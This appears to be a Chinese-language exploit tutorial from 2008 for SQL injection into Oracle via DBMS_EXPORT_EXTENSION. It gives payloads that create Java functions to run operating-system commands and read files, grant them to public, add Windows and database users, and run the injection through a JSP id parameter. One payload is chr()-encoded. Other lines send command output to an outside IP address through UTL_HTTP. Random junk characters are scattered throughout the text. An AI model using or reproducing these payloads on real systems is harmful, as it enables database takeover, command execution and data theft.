! B' b7 i* i+ R 6 C, a0 S& ]7 @. z/ l, @8 `: y* a" L% ?# H% U: s2 d6 p+ c0 U/ k
3.创建函数 - m! d B% z5 Y. m0 T# S6 u# y$ S# k+ G# d9 [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& l" D, U7 S% ]* M
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual+ E: Z8 F& r `3 G3 _6 a% }$ V
8 r' K+ Q: W( t! l( A5 n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' 4 y V2 t- v: n! g+ |$ _create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual N1 l0 N: p$ X8 i
: B G3 P1 O L( W) P( Z4 ]9 R
4.赋public执行函数的权限/ }- w6 t3 l+ Y* v( D0 b9 Q
- R4 }& L ?+ s+ _. Y5 H, _* \6 K2 T+ Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual; P+ w+ k' y* ]. m. k; i$ _
) A6 T+ h5 o5 g1 J, C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual3 X% Q5 z p! l0 v2 W$ W6 R! @ X
% S# K9 {0 I* ]; r+ U
- \1 @3 ~: z% P f% @" D2 P . s, n) [( n/ ?" ? @- a P8 n5.测试上面的几步是否成功 1 f1 N" z: m5 \" r1 D 5 n. k8 |; j% c$ rand '1'<>'11'||(4 ^: B5 _- u. O+ p
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' v# x* l5 v# g% W)" I5 ~" c0 ]( G
7 W- t j! n D- H
and '1'<>( 3 b0 \* U* N: Z4 D' {' K6 iselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 4 Z7 a+ r4 _5 X% |$ X7 O/ Z) % y) H, |+ ]( Q8 O& f7 e # a' D" b$ w, P7 D6.执行命令:' E% \# q* ^6 z) e4 Q
' {$ E! D2 w9 f+ l2 M+ y4 }
/xxx.jsp?id=1 and '1'<>( 3 H$ o/ o/ k' ?4 g+ S$ i+ A0 P( P: Wselect sys.LinxRunCMD('cmd /c net user linx /add') from dual0 z* {& l1 C3 _; X
) % i9 z' S- d4 M& h 9 c- E0 k, J* W6 {. m# v! Y/xxx.jsp?id=1 and '1'<>(4 n4 Z# ?& z$ o/ u* i% B9 c/ _, Z/ A
select sys.LinxReadFile('c:/boot.ini') from dual s( }8 r" P; G0 C Q7 x)7 N4 D9 Q% N% I: r7 x) N ?5 A
4 z# H" ]6 J0 }0 c2 `3 [5 C
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。4 x) U+ r; [. T4 ?
如果要查看运行结果可以用 union :. U/ @ a" k! u3 R7 p3 |, L% @* z
! F1 ]) t; N6 ]- ]) i
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual! o: ?& O. q4 A" q$ b$ I# i
' C: h1 [0 B$ l7 T或者UTL_HTTP.request(: 4 P; ?9 I* R* g0 Z, ?8 E v6 O* J6 F) ~$ t7 E
/xxx.jsp?id=1 and '1'<>(8 K% }) F$ h5 {6 r" L
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual ' Q x+ ~$ J. q7 h7 {5 ]" Y9 O8 E' X3 n: [) & Y Q) @/ G+ X4 m' v + N, Q4 L x# m/xxx.jsp?id=1 and '1'<>(# p0 P* ?; ^2 U4 g8 i4 {
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual ' M& |* Z7 r" ?! @1 M$ k7 f)/ u! I- I t: H* ^% _
" r) l+ c4 M4 P
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。, S: T) t8 f2 E% n
y, _) `% I2 j* N& A& x. K7 k9 w6 ` k
2 a r' v* V+ b: j5 @. Q( s1 a0 y5 @! S& ^
# P9 Z* g! Y9 w- C
--------------------* W* B) f; a9 Y5 D
7 G! n, x4 {# j: H3 H: u5 o6.内部变化; ]( N' B! L' d) U& n" X4 h* z
通过以下命令可以查看all_objects表达改变: ' X) \, ~: \+ L6 s$ _select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%' l& [, g% f# p7 i0 R2 J
) H6 x6 Z: L2 J. k* l- U% ^& @7.删除我们创建的函数 4 [( ]( l: j* c" Y$ L b) Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' 6 D4 E& K3 i; Q/ x/ ?2 xdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual9 N5 K8 q6 \# A. t, k* H
/ b, y- @" M4 F% x
8 M; {! E( y/ C" o8 i+ @2 _ A- d$ U3 W8 C' v/ ^ " C4 G) f' Z. l7 V5 T' X7 `( @+ X; |# o, o! h4 a! ^" K; C+ S
====================================================/ B: W/ r: N& I" X
全文结束。谨以此文赠与我的朋友。) k( `/ {" _* u6 }- t
4 y8 I' a. A8 P9 n [- Y9 d
linx 0 E3 f% a9 C: _% E' g- R1 j& X2 ?124829445 5 D g; B. x7 r, u8 a2008.1.12 8 L" \8 c$ H" h4 Z. \linyujian@bjfu.edu.cn + @7 z# g3 P% c! o# Q : S( S/ b! \: O( { C4 C3 P. T% _" O5 w4 p+ j
) R5 P6 P2 [* z4 ]& ^5 P, I
0 W! n! S L" h) ]5 \' ^1 B7 Y! ~0 B |0 {2 s% l/ ~. a
======================================================================! x) Z. @0 A9 ~( N$ [& s) [
' g6 B5 ~0 s) |; O! H
测试漏洞的另一方法: ; |, b6 G& O4 C1 |& E + c. j6 d( Q* ]( }0 c创建oracle帐号: 3 D* u( F% w/ nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ Z: W% b( y$ R& ~
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual " \* L" u& }1 ]+ O+ |) o1 M3 p* i( G2 k/ {5 Y
即: ! w2 w$ h6 y: F" Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82), 3 u8 R1 y: k+ z0 f. D& d! [chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 6 M- s; |; L4 x6 D' f2 A6 k9 c- ]: X. ~6 K d
确定漏洞存在:6 c8 g' Q' D1 t, j7 `. x( |
1<>( 0 y% Y! @9 g2 h. G* o @select user_id from all_users where username='LINXSQL'* Q: J5 e- C8 Y8 u3 u+ D
)8 a+ T8 L9 {7 _ `
: q8 e* a( S! E( l5 H5 f5 F6 D
给linxsql连接权限: # ?0 l3 g2 @8 {7 l zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', \6 \$ f. p( B# f- U7 C
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual8 A3 H8 N: i6 {# R8 ~" _4 @
6 n& `5 z* }! d O: \删除帐号:: ^- g6 q# L' k/ t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 Z/ w& ?7 \* W0 [9 j% U" J
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual - b+ i2 S% e% ^+ D , I! y4 q2 ]7 T) G( T======================9 f" w0 l" H. j) R: o: N, v4 Q' f
' h. M, E% a& f( A以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User: o3 B: x& t, K; s, {2 c2 D
, Q1 T4 k. t/ i+ a" \1.jsp?id=1 and '1'<>(3 P% {- h0 U) j4 X" W5 C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 V8 A p! m' @
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual8 K; v! D' |* o$ N5 u
) and ... , s0 N7 L* I. b& o, h' H I0 o+ W6 O# N9 E d( v2 N
1.jsp?id=1 and '1'<>( # B0 Y( J# B: U% I7 z& ^0 Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on Linx_query to public'''';END;'';END;--','SYS',0,'1',0) from dual ' u& c. z, r8 A) t) and ...6 \! \0 [0 E3 [2 M% R4 t4 q! h
6 P, M, q: @2 z/ f3 e; K' y! J1.jsp?id=1 and '1'<>( / C+ P! [' ?' f' H& e1 f. o$ G) VSELECT sys.Linx_Query('SELECT 14554 FROM DUAL') FROM DUAL b( l6 g# Q, H
) and ...$ f5 \4 O T7 U
7 H( v3 ^4 h0 T4 \ Y, V
4 Q0 H" l2 v9 ?/ W* u; l9 Q! X0 f ) P P \4 S2 n$ j1.jsp?id=1 and '1'<>( + g3 v/ C+ h0 B* o3 x; ^9 a% ^SELECT sys.Linx_Query('declare pragma* A) C. y. |, q
autonomous_transaction; begin execute immediate '' ; I4 |8 B% P2 y+ Jselect 1 from dual: M! z1 C: P# g9 h0 z( |
''; commit; end;') from dual4 A0 a$ ? a' g$ F0 F( {' a
) and ... E3 q" T$ n3 M: |7 ~. V. Q7 y% z" |' g( F5 Z( r P! D, X
多语句:9 Q2 E( g1 g) z8 n
SELECT sys.Linx_Query('declare temp varchar2(200); begin select 1 into temp from dual; select 2 into temp from dual; end;') from dual `, ]1 r) @$ X' h
' Q# |, M2 [% o% d% p+ Q" O. O创建用户(除非当前用户有system权限,否则无法成功): $ N7 A4 s* K: F6 ?# ~, }4 S$ cSELECT sys.Linx_Query('declare pragma 8 O# j0 J1 E9 A) g+ Mautonomous_transaction; begin execute immediate ''/ O& ?+ E8 y# @. _. S
CREATE USER Linx_Query_User IDENTIFIED BY Linx_Query_User4 Q3 ~3 L r# z
''; commit; end;') from dual; Z% J# L* c4 ~+ V, Q+ L0 I7 B# X) P